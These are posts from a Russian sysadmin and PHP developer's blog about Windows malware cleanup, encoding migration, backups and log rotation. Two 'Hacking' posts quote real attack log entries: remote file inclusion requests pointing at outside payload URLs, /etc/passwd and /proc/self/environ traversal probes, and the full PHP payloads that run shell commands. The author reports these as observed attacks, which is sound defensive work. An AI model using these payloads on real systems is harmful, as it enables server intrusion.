заметки на полях

Вирус требующий SMS

Дерябин Сергей — Sun, 28 Feb 2010 00:32:26 +0000

Принес мне товарищ ноутбук с вирусом, который при загрузке блокирует все действия и требует отправить SMS для разблокировки. Ну вещь вроде бы довольно распространенная в последнее время, а переустанавливать все заново было жалко времени – решил полечить.
Вылечилось все на ура с Dr. Web Live CD
Дальше оказалось все не так просто, установленный Avast отказывался запускаться под таким предлогом «невозможно открыть данную программу из-за политики ограничения применения программного обеспечения». Немного погуглив открыл для себя что в XP Home есть политики безопасности. Нашел даже на Microsoft ответ на мой вопрос

Пользователи получают сообщение «Windows не может открыть эту программу, так как это запрещено политикой ограничений программ. За дополнительной информацией обратитесь системному администратору или откройте «Просмотр событий».» Или в окне командной строки появляется сообщение «Не удается выполнить указанную программу.»
Причина. В установленном по умолчанию уровене безопасности (или правиле) для программы выбрано значение Не разрешено, и в результате программа не запускается.

Решение. Найдите в журнале событий более подробное описание сообщения. Сообщения журнала событий указывают, для какого программного обеспечения установлен параметр Не разрешено и какое именно правило применяется к программе.

Но не ответ на самый главный вопрос «че делать-то?!»
Вариант копания в политиках отпал быстро, т. к. gpedit.msc или отсутствовал изначально или был заботливо удален вирусом. Нашел более элегантный вариант, удалить целиком ветку реестра: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer
Ну вот и все, борьба окончена ) набираю в консоли regedit и получаю ~~ху…~~

Конец? Перестановка?
Нашел что редактирование реестра можно разрешить через групповые политики (подробнее тут), но вариант не подходит потому как редактор потерт – замкнутый круг какой – то
Так вот политики все равно хранятся как я понял в реестре и можно из консоли удалить запрет на редактирование реестра (честно говоря сначала сомневался что получится – в редактор зайти нельзя, а из консоли пожалуйста) (подробнее тут):

REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /f

Regedit заработал и удалив указанную выше ветку реестра стал запускаться антивирус.

Список городов по странам и регионам

Дерябин Сергей — Thu, 11 Feb 2010 02:09:47 +0000

В архиве дамп трех табличек:

страны
регионы (с привязкой к стране)
города (с привязкой к региону и стране)

Кодировка файла UTF-8. Размер архива 4,7Мб. Забирать здесь.

После заливки желательно прицепить ключи:

ALTER TABLE region ADD constraint fk_region_ref_country FOREIGN KEY (country_id) REFERENCES country (id) ON DELETE restrict ON UPDATE cascade;
ALTER TABLE city ADD constraint fk_city_ref_region FOREIGN KEY (region_id) REFERENCES region (id) ON DELETE restrict ON UPDATE cascade;
ALTER TABLE city ADD constraint fk_city_ref_country FOREIGN KEY (country_id) REFERENCES country (id) ON DELETE restrict ON UPDATE cascade;

Как float зависит от локали?!

Дерябин Сергей — Sat, 06 Feb 2010 12:59:46 +0000

На такой казалось бы элементарный вопрос далеко не тривиальный ответ, и столкнувшись с ним может пострадать не один монитор или клавиатура от нелепости ситуации, мне повезло – я вовремя нагуглил правильный ответ Теперь собственно к делу. Вот код и ожидаемый результат его выполнения:

$float = "3.14";
echo $float; // 3.14
echo floatval($float); // 3.14

У меня же получился другой вариант, от которого я честно говоря подвис:

$float = "3.14";
echo $float; // 3.14
echo floatval($float); // 3,14

Выяснилось что результат зависит от установки локали, у меня стояло: setlocale(LC_ALL, "ru_RU.UTF8"); пока остановился на таком варианте:

setlocale(LC_CTYPE, "ru_RU.utf8");
setlocale(LC_TIME, "ru_RU.utf8");

PHP у меня 5.2.10, а баг сей я так понимаю тащится аж с 2002 года версии 4.3.0 RC2: Bug #17079 setlocale changes the internal representation of floats

Перевод сайта c cp1251 на UTF-8

Дерябин Сергей — Wed, 13 Jan 2010 18:57:03 +0000

Для начала перевести БД из cp1251 в utf8.
Сделать дамп mysqldump -u svd -n --skip-opt --skip-set-charset --triggers --disable-keys svdev > dump.sql – получится чистый дамп без упаминания кодировок, можно получить отдельно данные: mysqldump -u svd -nt --skip-opt --skip-set-charset --disable-keys svdev > data.sql, поменять кодировку полей в схеме, вместо:

name varchar(64) character SET cp1251 NOT NULL

сделать

name varchar(64) character SET utf8 NOT NULL

или же убрать упоминание кодировки из полей вовсе:

name varchar(64) NOT NULL

так как при установке правильной кодировки для БД кодировки для текстовых полей создаваемых таблиц будут устанавливаться верно сами, затем изменить кодировку самой БД:

ALTER DATABASE svdev DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci

и залить назад в обратном порядке – сначала структуру, затем данные.
Следующим шагом необходимо изменить кодировку файлов, для этого я набросал простенький скрипт (подключаемые библиотеки которые трогать не надо – типа tiny просто вынес сначала из проекта, а затем вернул обратно:

#!/bin/sh
for FILE in `find /var/www/svdev/ | egrep -i "\.(php|html)$"`
do
iconv -f cp1251 -t utf8 $FILE > $FILE".utf"
mv -f $FILE".utf" $FILE
echo $FILE" - work complete"
done

Он в заданной директории файлы по маске .php и .html перекодирует в UTF используя утилиту iconv во временный файл, а затем перезаписывает исходный файл временным.
Следующим шагом убедимся в правильной настройке mb_ функций PHP. Для этого создадим файлик vim strtest.php и положим в него следующее содержимое:

echo strlen("мама мыла раму") . "\n";
echo mb_strlen("мама мыла раму") . "\n";
echo mb_strlen("мама мыла раму", "UTF-8");
?>

Правильная длина строки – 14 символов. Выполним его из консоли: php5-cgi strtest.php В начале у меня получилось следующее:

X-Powered-By: PHP/5.2.10-2ubuntu6.3
Content-type: text/html

26
26
14

Для исправления – установим верные значения в /etc/php5/cgi/php.ini и /etc/php5/cli/php.ini, для этого по файлу надо поискать encoding и charset
Нашлись следующие параметры:

default_charset = "UTF-8"
...
mbstring.language = Russian
mbstring.internal_encoding = UTF-8

Теперь при повторном выполнении теста php5-cgi strtest.php второе значение без указания кодировки должно совпасть с первым и появиться кодировка по умолчанию:

X-Powered-By: PHP/5.2.10-2ubuntu6.3
Content-type: text/html; charset=UTF-8

26
14
14

Так же не лишним будет в конфиге проекта указать верно локаль, к примеру setlocale(LC_ALL, "ru_RU.utf8"); список доступных локалей в системе можно посмотреть locale -a (ну и на всякий случай проверить что с новой локалью не будет багов, подробнее здесь: Как float зависит от локали?! )
Указать кодировку в настройках nginx для нужного сайта /etc/nginx/sites-available/svdev:

server {
...
charset UTF-8;
source_charset UTF-8;
...
}

Ну и самая нудная часть – пройтись по проекту и заменить функции работы со строками на их mb_ аналоги, в используемые регулярные выражения добавить модификатор u и если отправляются где-то письма – изменить кодировку писем.
Ну вот вроде и все! Перед всеми манипуляциями неплохо бы сделать резервную копию файлов и БД, на всякий случай.

Дополнительное чтиво

Hacking часть II

Дерябин Сергей — Tue, 29 Dec 2009 16:18:14 +0000

Продолжаю серию забавных вещей из логов:

client: 188.126.37.18, server: ***, request: "GET ////?_SERVER[DOCUMENT_ROOT]=http://photoworld.com.ua////zfxid1.txt??

Файлик zfxid1.txt следующего содержания:

zfxid.txt
/* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>

Дальше интересней

client: 89.38.128.140, server: ***, request: "GET /easy-git//?_SERVER[DOCUMENT_ROOT]=http://hiiraginao.com//test.gif??
client: 89.38.128.140, server: ***, request: "GET //?_SERVER[DOCUMENT_ROOT]=http://hiiraginao.com//test.gif??

Файлик test.gif следующего содержания:

SysTrojan

Wrong Place

if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}else{
echo("Safe Mode of this Server is : ");
echo("SafemodeON");
}
}
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
exit;
?>

Ну и последний на сегодня

client: 89.185.231.103, server: ***, request: "GET //?_SERVER[DOCUMENT_ROOT]=http://www.solmae.co.kr/upload/bbs/conf2.txt????

и файлик conf2.txt следующего содержания:

$dir = @getcwd();
$ker = @php_uname();
echo "3"."1"."3"."3"."7"."
";
$OS = @PHP_OS;
echo "
OSTYPE:$OS
";
echo "
Kernel:$ker
";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."
";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}

echo "
3"."1"."2"."3"."4
";
?>

onPHP 1.1 удобные формы

Дерябин Сергей — Mon, 28 Dec 2009 15:38:53 +0000

Наконец-то формы стали более дружелюбны к разработчика. Убрали широко используемые до этого addRule() вместо них теперь можно добавлять свои ошибки на поля формы в дополнение к стандартным отсутствие/неверное значение.
Еще из приятных вещей, что можно получить ошибку для конкретного поля, не придумывая для этого замысловатые конструкции (не все же ведь ошибки выводят скопом, некоторые и около полей); появились еще и описания ошибок – дополнительные поля, которые можно использовать (а можно и не использовать) по своему усмотрению.
У PrimitiveList больше нет методов setDefaultAction() и getActualValue – надо просто установить значение setValue(), и оно и будет дефолтным в случае чего, при получении через getChoiceValue().

Небольшой примерчик:

const ACTION_REGISTRATION = 'reg';
const ERROR_LOGIN_USED = 3; // 1 и 2 - стандартные ошибки

...

$form = Form::create()->
add(
Primitive::string('login')->
setAllowedPattern('/^.{4,}$/is')
)->
add(
Primitive::choice('action')->
setList($actionList)->
// значение по умолчанию
setValue(self::ACTION_REGISTRATION)
);

$form->import($request->getGet())->importMore($request->getPost());
...
// Здесь мы узнаем что такая учетка уже есть
$form->markCustom('login', self::ERROR_LOGIN_USED);

И теперь в шаблоне зададим значения для 3х ошибок (можно еще и описания)

$form->addWrongLabel('login', 'Логин указан неверно');
$form->addCustomLabel('login', BasePrimitive::MISSING, 'Логин не указан');
$form->addCustomLabel('login', UserRegistration::ERROR_LOGIN_USED, 'Логин уже зарегистрирован');
// Можно дополнительно задать описание для ошибки
$form->addErrorDescription('login', UserRegistration::ERROR_LOGIN_USED, 'Выберите другой логин');
// Выводить можно по старинке
foreach($form->getTextualErrors() as $err) {
?>=$err?>
}
// А можно рядом с необходимым полем:
?>
=$form->getTextualErrorFor('login')?>
=$form->getErrorDescriptionFor('login')?>

Hacking часть I

Дерябин Сергей — Mon, 28 Dec 2009 10:00:48 +0000

Обнаружил в логах довольно забавную картину по поиску слабых мест

client: 83.168.217.53, server: ***, request: "GET /plug.php?p=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%00&a=resume&id=846 HTTP/1.0"

Ну и дальше вместо всех переменных пробуем подставлять:

/proc/self/environ%00
/../../../../../../../../../../proc/self/environ%00
/etc/passwd%00
../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../etc/passwd%00

Что самое интересное – откуда такая уверенность в относительности пути?! Именно так и никак иначе пытаться впихнуть.

А вот ходят по другому поводу

client: 203.237.238.234, server: ***, request: "GET /***.html///?_SERVER%5BDOCUMENT_ROOT%5D=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1"

client: 203.237.238.234, server: ***, request: "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1"

Интересно, что за сканер такой, или руками?

PHP библиотека GD в debian сборке или выкидываем GD на помойку

Дерябин Сергей — Thu, 24 Dec 2009 00:34:00 +0000

В ходе работы выяснилась неприятная вещь – в библиотеке GD под debian отсутствуют некоторые функции, я столкнулся именно с imagerotate. Некоторые предлагают пересобрать PHP c использованием библиотеки разработчиков, вместо системной, но нашлось более элегантное решение – ImageMagick и PHP обертка для нее Imagick.
Собственно давно уже пора переходить на её использование:

быстрее
возможность выбора различных фильтров при ресайзе
ОО интерфейс
нет необходимости заморачиваться с типами файлов – все уже сделано за нас
эксепшены вместо ошибок

Ну и наверняка есть еще достоинства, которые просто не пришли вот так сразу в голову.

Поставим её.

sudo apt-get install imagemagick
sudo apt-get install php-pear
sudo pecl install imagick

Если второй шаг завершится ошибкой, вроде этой: ERROR: `phpize' failed то необходимо установить:

sudo apt-get install php5-dev

и повторить установку Imagick, при возникновении ошибки ERROR: `/tmp/pear/temp/imagick/configure --with-imagick' failed необходимо дополнительно установить:

# для debian:
sudo apt-get install libmagick9-dev
# для убунты:
sudo apt-get install libmagickwand-dev

Теперь Imagick должен точно встать, если нет – то дальше в Google.
Осталось только прописать новую либу в php.ini:

extension=imagick.so

http://www.php.net/manual/en/book.imagick.php – дока по Imagick
http://valokuva.org/?cat=1 – блог с полезными и познавательными примерами использования Imagick

Backup проекта, часть 2

Дерябин Сергей — Tue, 22 Dec 2009 17:54:40 +0000

Немного ранее, был представлен SHELL скрипт резервного сохранения данных проекта. При наличии нескольких проектов хочется каким-то образом систематизировать этот процесс, для облегчения подключения новых проектов к резервному копированию, кроме как плодить файлы с дублированием кода, учитывая тот факт, что со временем может измениться логика выполняемых действий или настройки подключения к БД/FTP серверу.

Вынесем общую логику в отдельный скрипт, а индивидуальные данные проекта, такие как имя БД и загружаемые файлы в конфигурационный файл для каждого проекта.

Для получения дампа БД, если проекты на сервере используют один сервер, но различные базы удобно создать отдельного пользователя для нашего скрипта и дать ему права на чтение и блокировку таблиц необходимых БД:

CREATE USER backup@localhost IDENTIFIED BY 'dbpassword';
GRANT SELECT, LOCK TABLES ON svdev.* TO backup@localhost;

Далее немного модифицируем скрипт из предыдущей части для подключения настроек. Так же проект может не использовать БД или использовать совместно с другим проектом, в этом случае достаточно сохранить её один раз – такая возможность так же реализована. Вот что получилось в итоге:

#!/bin/sh

#Данные для подключения к БД

DBUSER="backup"
DBPASS="dbpassword"

# FTP для сохранения данных
FTPUSER='ftpuser'
FTPHOST='ftphost'
FTPPASS='ftppassword'

# Путь на FTP где хранятся бэкапы, общая директория,
# в которой для каждого проекта есть поддиректория,
# путь от домашней директории пользователя FTP
FTPPATH="./"

# Дата, для именования файла бэкапа в формате YYYY.MM.DD
DT=`date '+%Y.%m.%d'`
# Временная директория для хранения файлов
TEMPDIR="/tmp/backup-"$DT"/"
SQLFILE="dump.sql"
# Файл архива
DESTFILE=$DT".tar"

mkdir $TEMPDIR
cd $TEMPDIR

echo "Начало резервного копирования: "`date '+%F %T'`

# Если все проекты находятся в директории /var/www то для каждого, который
# необходимо сохранить должен быть файл backup.conf
for CONFIG in `find /var/www -mindepth 2 -maxdepth 2 -name backup.conf`
do
. $CONFIG
# Если в конфиге установлено имя БД, до делаем её дамп
# и добавляем в архив
if [ ! -z $DBNAME ]; then
mysqldump --user=$DBUSER --password=$DBPASS $DBNAME > $SQLFILE
TARFILES=$TARFILES" -C "$TEMPDIR" "$SQLFILE
fi

tar -cf $DESTFILE $TARFILES
gzip -9 $DESTFILE

# Отправляем полученный архив на FTP; не забываем
# включить бинарный режим передачи, иначе архивы побъются
ftp -n $FTPHOST <<EOF
quote USER $FTPUSER
quote PASS $FTPPASS
binary
cd $FTPPATH$PROJECTNAME
put $DESTFILE".gz"
quit
EOF

echo " - "`date '+%F %T'`" проект "$PROJECTNAME" сохранен, размер архива "`stat -c %s $DESTFILE'.gz'`" байт;"

# Удаляем за собой все файлы
for TFILE in $TEMPDIR"/*"
do
rm -rf $TFILE
done
done

# Удаляем за собой временную директорию
rm -rf $TEMPDIR

Полученный файл назовем sites-backup и положим его в /etc/cron.daily/ таким образом он будет запускаться один раз в сутки, вместе с остальными служебными скриптами, такими как ротация логов и другие. Для пущей надежности права на файл лучше дать 700 и сделать владельцем рута:

sudo chown root:root /etc/cron.daily/sites-backup
sudo chmod 0700 /etc/cron.daily/sites-backup

Осталось только для каждого проекта создать файл конфига. К примеру для проекта svdev, получаем следующий конфиг /var/www/svdev.ru/backup.conf:

#!/bin/sh
DBNAME="svdev"
PROJECTNAME="svdev.ru"
TARFILES=" -C /var/www/svdev.ru/htdocs wp-config.php -C /var/www/svdev.ru/htdocs/wp-content uploads"

Если БД не используется, то необходимо указать пустую строку в качестве имени БД:

#!/bin/sh
DBNAME=""
PROJECTNAME="svdev.ru"
TARFILES=" -C /var/www/svdev.ru/htdocs wp-config.php -C /var/www/svdev.ru/htdocs/wp-content uploads"

Теперь для создания бэкапов нового проекта необходимо дать права пользователю скрипта на БД, создать на удаленном FTP директорию куда будут складываться архивы и добавить конфиг из 3х строчек.

Главное не забывать вовремя чистить FTP.

Ротация логов nginx

Дерябин Сергей — Sat, 19 Dec 2009 14:45:07 +0000

Простенький скрипт, который проверяет доступность пакета logrotate и запускает ротацию. Кладется в /etc/cron.daily и запускается как правило в 4 часа утра, за это отвечает запись в /etc/crontab (у меня в 6 часов 25 минут):

25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )

Сам скрипт, запускающий суточные задания:

#!/bin/sh

test -x /usr/sbin/logrotate || exit 0
/usr/sbin/logrotate /etc/logrotate.conf

Среди которых ротация логов nginx:

/var/log/nginx/*.log /var/www/*/logs/error.log {
daily
missingok
rotate 1
compress
delaycompress
notifempty
create 640 root adm
sharedscripts
postrotate
[ ! -f /var/run/nginx.pid ] || kill -USR1 `cat /var/run/nginx.pid`
cat /var/log/nginx/error.log.1 | mail -s "Nginx error log" root
cat /var/www/*/logs/error.log.1 | mail -s "Sitests nginx error log" root
endscript
}

Что здесь происходит? Ротируются логи nginx из /var/log/nginx а за позапрошлый день сжимаются и так же с логами для всех проектов, если учесть что проекты находятся в /var/www а логи соответственно в директории logs проекта. А логи за предыдущий день отправляются на почту рута двумя письмами – одно со всех проектов, а второе самого nginx.